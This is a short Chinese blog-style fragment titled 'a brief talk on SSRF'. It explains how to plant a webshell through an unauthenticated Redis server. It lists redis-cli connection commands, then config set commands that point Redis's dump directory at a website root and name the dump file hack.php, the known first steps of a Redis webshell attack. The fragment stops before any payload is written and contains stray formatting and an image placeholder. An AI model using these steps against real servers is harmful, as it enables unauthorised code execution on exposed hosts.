浅谈SSRF

·

在redis未授权的情况下如何写webshell

命令:
浅谈SSRF_第1张图片

/bin/redis-server /etc/redis/redis.conf
##启动redis进程
ps -ef|grep 'redis'
##查看redis进程
redis-cli -h 127.0.0.1 -p 6379
##若redis服务器开放到公网,没有密码校验,可直接连接*
*进入redis后,配置目录、数据库文件和参数:*
config set dir /www/wwwroot/www.baidu.com
config set dbfilename hack.php

你可能感兴趣的:(redis,web安全)